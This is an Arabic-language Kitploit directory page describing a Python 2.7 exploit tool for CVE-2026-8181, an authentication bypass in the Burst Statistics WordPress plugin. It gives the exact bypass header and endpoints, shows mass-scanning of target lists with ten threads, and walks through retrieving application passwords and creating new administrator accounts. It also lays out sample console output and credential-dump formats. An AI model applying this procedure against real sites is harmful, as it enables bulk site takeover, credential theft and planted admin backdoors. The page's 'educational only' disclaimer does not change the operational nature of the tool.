Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jenderal92/cve-2026-8181
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181: Burst Statistics Auth Bypass → الاستيلاء على REST API وإنشاء حساب مسؤول. Python 2.7. للاستخدام التعليمي فقط.

عرض المستودع
5منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-8181 - استغلال تجاوز المصادقة في Burst Statistics

Python 2.7 أداة استغلال لثغرة إضافة Burst Statistics (CVE-2026-8181) التي تسمح للمهاجمين غير المصادقين بتجاوز مصادقة REST API، واسترجاع كلمات مرور التطبيقات، وإنشاء مستخدمين جدد بصلاحيات مسؤول على مواقع WordPress الضعيفة.

⚠️ إخلاء المسؤولية
هذه الأداة مخصصة لأغراض الاختبار التعليمي واختبار الاختراق المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها فقط على مواقع الويب التي تملكها أو لديك إذن صريح لاختبارها. يمكنك الاطلاع على مزيد من إخلاء المسؤولية على غلاف Jenderal92. يمكنك التحقق منه هنا !!!

تؤثر ثغرة CVE-2026-8181 على إضافة Burst Statistics لنظام WordPress (الإصدارات التي تسبق التصحيح). تكمن الثغرة في آلية مصادقة REST API، مما يسمح للمهاجم بـ:

  • تجاوز المصادقة عن طريق إرسال ترويسة X-BURSTMAINWP مُحضّرة خصيصًا
  • استرجاع كلمات مرور التطبيقات عبر نقطة النهاية /burst/v1/mainwp-auth
  • تنفيذ إجراءات بصلاحيات مرتفعة (سرد المستخدمين، قراءة الإعدادات، إنشاء حسابات مسؤول جديدة) عبر WordPress REST API

الميزات

  • فحص متعدد الخيوط (10 خيوط افتراضيًا)
  • اكتشاف تلقائي للمسارات الأساسية لـ WordPress (/, /wordpress, )
/wp
  • تعداد أسماء المستخدمين عبر /wp-json/wp/v2/users أو إعادة توجيه معرف المؤلف
  • استغلال تجاوز المصادقة من أجل:
    • الحصول على كلمات مرور التطبيقات (رمز مشفّر بـ Base64)
    • التحقق من الوصول إلى نقاط نهاية REST الحساسة (الإعدادات، الإضافات، مستخدمو المسؤول)
    • إنشاء مستخدم مسؤول جديد ببيانات اعتماد عشوائية
  • ملفان للإخراج:
    • res_login.txt – بيانات اعتماد REST API موجزة ومفصولة بعلامة (|) (سهلة التحليل/الاستيراد)
    • full_res_login.txt – تقرير كامل قابل للقراءة البشرية يتضمن التحقق من الوصول وكلمات مرور التطبيقات
  • المتطلبات

    • Python 2.7 (مهمل ولكنه مطلوب من قبل السكربت)
    • مكتبة requests
    root@kitploit:~
    pip install requests
    

    الاستخدام

    1. قم بإعداد ملف قائمة الأهداف (نطاق أو عنوان IP واحد في كل سطر، مع أو بدون http:///https://).

      مثال targets.txt:

      root@kitploit:~
      example.com
      https://vulnerable-site.com
      127.0.0.1/wordpress
      
    2. قم بتشغيل الاستغلال:

    root@kitploit:~
    python2 CVE-2026-8181.py targets.txt
    
    1. تُحفظ النتائج في ملفين في الدليل الحالي:
      • res_login.txt – بيانات اعتماد REST API (سطر واحد لكل هدف ضعيف)
      • full_res_login.txt – تقرير مفصّل

    خيارات سطر الأوامر

    الوسيطةالوصف
    list.txtمسار الملف الذي يحتوي عناوين الأهداف

    مثال على الإخراج (وحدة التحكم)

    root@kitploit:~
    ============================================================
    CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
    ============================================================
    [*] Total targets: 2
    [*] Threads: 10
    [*] Base paths: ['', '/wordpress', '/wp']
    
    [*] Scanning: example.com
        Trying path: /
        Detected username: admin
        [+] VULNERABLE! REST API bypass successful
        [+] Application Password obtained!
        [+]   Username: admin
        [+]   App Password: xxxx xxxx xxxx
        [+]   Base64 Token: YWRtaW46eHh4eA==
        [+] Access confirmed: WordPress settings
        [+] Access confirmed: Installed plugins
        [+] Access confirmed: Admin users
        [+] Admin user created via REST API: wp_abc123
        [+] Results saved to res_login.txt and full_res_login.txt
    

    تنسيقات ملفات الإخراج

    1. res_login.txt – بيانات اعتماد REST API الموجزة

    كل سطر يتبع هذا التنسيق المفصول بعلامة (|):

    root@kitploit:~
    target|username|password|email|user_id
    

    مثال:

    root@kitploit:~
    http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
    

    هذا التنسيق مثالي من أجل:

    • الاستيراد إلى مديري كلمات المرور أو قواعد البيانات
    • أتمتة إجراءات إضافية (مثل سكربتات تسجيل الدخول)
    • الفحص السريع باستخدام cut أو grep أو Excel

    2. full_res_login.txt – التقرير المفصل الكامل

    لكل هدف ضعيف، يضيف السكربت كتلة قابلة للقراءة البشرية:

    root@kitploit:~
    ============================================================
    Target: http://example.com
    ============================================================
    
    [+] Access Verification:
        [+] WordPress settings
        [+] Installed plugins
        [+] Admin users
    
    [+] REST API Credentials:
        Username: wp_abc123
        Password: random12char
        Email: [email protected]
        User ID: 42
        URL: http://example.com/wp-admin/
        Note: Use with X-BURSTMAINWP header
    
    [+] Application Password:
        Username: admin
        App Password: xxxx xxxx xxxx
        Base64 Token: YWRtaW46eHh4eA==
    

    ملاحظة: إذا لم تكن نقطة نهاية كلمة مرور التطبيق متاحة أو لم تُرجِع أي رمز، فسيظهر هذا القسم كـ FAILED.

    كيف يعمل

    1. تحضير الهدف – يضيف بادئة http:// إذا كانت مفقودة، ويزيل الشرطات المائلة اللاحقة.
    2. التكرار على المسارات – يجرب / و/wordpress و/wp كدلائل أساسية لـ WordPress.
    3. تعداد أسماء المستخدمين – يجلب /wp-json/wp/v2/users أو يستخدم عمليات إعادة التوجيه ?author=N.
    4. اختبار التجاوز – يرسل X-BURSTMAINWP: 1 مع مصادقة Basic باستخدام اسم المستخدم وكلمة مرور وهمية (CVE-2026-8181). إذا أعادت نقطة النهاية /wp-json/wp/v2/users/me?context=edit رمز الحالة 200، يكون الموقع ضعيفًا.
    5. الاستغلال –
      • يطلب /wp-json/burst/v1/mainwp-auth لاسترجاع رمز كلمة مرور التطبيق.
      • يتحقق من الوصول إلى /settings و/plugins و/users.
      • ينشئ حساب مسؤول جديد عبر POST /wp-json/wp/v2/users.
    6. حفظ النتائج – يكتب بيانات اعتماد REST الموجزة إلى res_login.txt والتفاصيل الكاملة إلى full_res_login.txt.

    التخصيص

    يمكنك تعديل هذه المتغيرات داخل السكربت:

    • THREADS – عدد الخيوط المتزامنة (10 افتراضيًا)
    • BASE_PATHS – أدلة فرعية إضافية لـ WordPress للتحقق منها
    • قيم المهلة لمكتبة requests

    الترخيص

    هذا المشروع مقدم لأغراض تعليمية فقط. الاستخدام على مسؤوليتك الخاصة.

    المراجع

    • تفاصيل CVE-2026-8181 (مرجع افتراضي)
    • إضافة Burst Statistics (الإصدارات المتأثرة)
    تنزيل الأداة